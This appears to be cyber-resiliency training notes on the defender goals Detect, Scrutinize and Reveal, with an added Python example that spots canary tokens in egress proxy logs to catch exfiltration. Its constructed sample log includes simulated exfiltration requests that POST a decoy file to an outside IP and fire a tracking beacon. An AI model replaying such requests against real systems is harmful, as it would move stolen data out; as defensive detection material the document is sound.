Defender Goal – Detect
• Intended Effect - Identify threat events or their effects by discovering or discerning the fact that an event is occurring, has occurred, or (based on indicators, warnings, and precursor activities) is about to occur.
• Expected Result - The adversary’s activities become susceptible to defensive responses.
• Effect on Risk - Reduce likelihood of impact and reduce level of impact (depending on responses).
• Example - The defender continually moves its sensors (functional relocation of sensors), often at random times (temporal unpredictability), to common points of egress from the organization. They combine this with the use of beacon traps (tainting). The result is that the defender can quickly detect efforts by the adversary to exfiltrate sensitive information.
• Evidence - Adversary activities are detected, or indicators, warnings, and/or precursor activities are observed.
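Added example (not from the deck or from NIST SP 800-160 Vol 2): the tainting half of the Detect slide, i.e. beacon traps at an egress point. Decoy documents are seeded with unpredictable canary tokens that never appear in legitimate traffic; an egress sensor scans outbound requests for any registered token and raises a high-confidence alert naming the decoy, the source host and the destination. The log format, the registry of planted decoys and the sample log lines are constructed for this example (the `cn-` token prefix and the `src=/dst=/uri=` field layout are assumptions, not a real product's format).

```python
import re
import secrets
from dataclasses import dataclass
from typing import Dict, List

# Canary tokens: unpredictable identifiers planted in decoy documents ("tainting").
# Legitimate traffic never carries one, so a single hit at egress is strong evidence.
TOKEN_RE = re.compile(r"cn-[0-9a-f]{16}")


def mint_token() -> str:
    return "cn-" + secrets.token_hex(8)


def plant_decoy(registry: Dict[str, str], location: str) -> str:
    """Register a fresh token for a decoy placed at `location`. The registry is held by
    the defender, off the monitored hosts, so the adversary cannot tell bait from real."""
    token = mint_token()
    registry[token] = location
    return token


# Constructed registry of decoys already planted (token -> where the decoy lives).
DECOY_REGISTRY: Dict[str, str] = {
    "cn-6f1e9c0a3b7d2e41": "fileshare://finance/Q3_forecast_DRAFT.xlsx",
    "cn-a84d0f23c9e17b55": "mail://exec-assistant/travel_itinerary.docx",
}

# Assumed egress proxy log format (hypothetical, constructed for this example):
#   <timestamp> src=<ip> dst=<host> method=<verb> uri="<path>" [body="<excerpt>"]
LOG_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) method=(?P<method>\S+) '
    r'uri="(?P<uri>[^"]*)"(?: body="(?P<body>[^"]*)")?$'
)


@dataclass(frozen=True)
class Alert:
    token: str
    decoy: str
    src: str
    dst: str
    ts: str


def scan_egress_log(lines: List[str], registry: Dict[str, str]) -> List[Alert]:
    """Flag any outbound request carrying a registered canary token in its URI or body."""
    alerts: List[Alert] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these and alert on spikes
        haystack = m["uri"] + " " + (m["body"] or "")
        for token in TOKEN_RE.findall(haystack):
            decoy = registry.get(token)
            if decoy is not None:  # well-formed but unregistered tokens are noise, not evidence
                alerts.append(Alert(token, decoy, m["src"], m["dst"], m["ts"]))
    return alerts


# Constructed sample log: one normal request, two canary hits, one unregistered token.
SAMPLE_LOG = [
    '2024-06-11T09:14:02Z src=10.20.4.17 dst=cdn.example.net method=GET uri="/static/app.js"',
    '2024-06-11T09:14:09Z src=10.20.4.17 dst=203.0.113.45 method=POST uri="/upload" '
    'body="file=Q3_forecast_DRAFT.xlsx;marker=cn-6f1e9c0a3b7d2e41"',
    '2024-06-11T09:15:31Z src=10.20.9.3 dst=198.51.100.22 method=GET uri="/b/cn-a84d0f23c9e17b55.gif"',
    '2024-06-11T09:16:00Z src=10.20.4.17 dst=203.0.113.45 method=POST uri="/upload" '
    'body="file=readme.txt;marker=cn-ffffffffffffffff"',
]

if __name__ == "__main__":
    for a in scan_egress_log(SAMPLE_LOG, DECOY_REGISTRY):
        print(f"{a.ts} decoy {a.decoy} left via {a.src} -> {a.dst} (token {a.token})")
```

The third sample line shows the beacon-trap variant: a decoy document that fetches an image whose URL embeds the token fires the moment it is opened, even if the file itself never passes through the proxy in the clear. Matching only registered tokens keeps the false-positive rate at essentially zero, which is what makes this evidence actionable rather than merely suggestive.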
Defender Goal – Scrutinize
• Intended Effect - Analyze threat events and artifacts associated with threat events, particularly with respect to patterns of exploiting vulnerabilities, predisposing conditions, and weaknesses, to inform more effective detection and risk response.
• Expected Result - The adversary loses the advantages of uncertainty, confusion, and doubt. The defender understands the adversary better, based on analysis of adversary activities, including the artifacts (e.g., malicious code) and effects associated with those activities and on correlation of activity-specific observations with other activities (as feasible), and thus can recognize adversary TTPs.
• Effect on Risk - Reduce likelihood of impact.
• Example - The defender deploys honeynets (misdirection), inviting attacks by the adversary and allowing the adversary to apply its TTPs in a safe environment. The defender then analyzes (malware and forensic analysis) the malware captured in the honeynet to determine the nature of the attacker’s TTPs, allowing it to develop appropriate defenses.
• Evidence - Number and quality (e.g., correctness, usefulness) of malware signatures and characteristics. Number and quality (e.g., degree of confirmation) of observables and indicators. Distinct threat actors and/or campaigns being observed.
Defender Goal – Reveal
• Intended Effect - Increase awareness of risk factors and relative effectiveness of remediation approaches across the stakeholder community, to support common, joint, or coordinated risk response.
• Expected Result - The adversary loses the advantage of surprise and possible deniability. The adversary’s ability to compromise one organization’s systems to attack another organization is impaired, as awareness of adversary characteristics and behavior across the stakeholder community (e.g., across all computer security incident response teams that support a given sector, which might be expected to be attacked by the same actor or actors) is increased.
• Effect on Risk - Reduce likelihood of impact, particularly in the future.
• Example - The defender participates in threat information sharing and uses dynamically updated threat intelligence data feeds (dynamic threat modeling) to inform actions (adaptive management).
• Evidence - Distinct threat actors, campaigns, and/or TTPs observed by multiple organizations. Degree of confidence in attribution of events to threat actors or campaigns.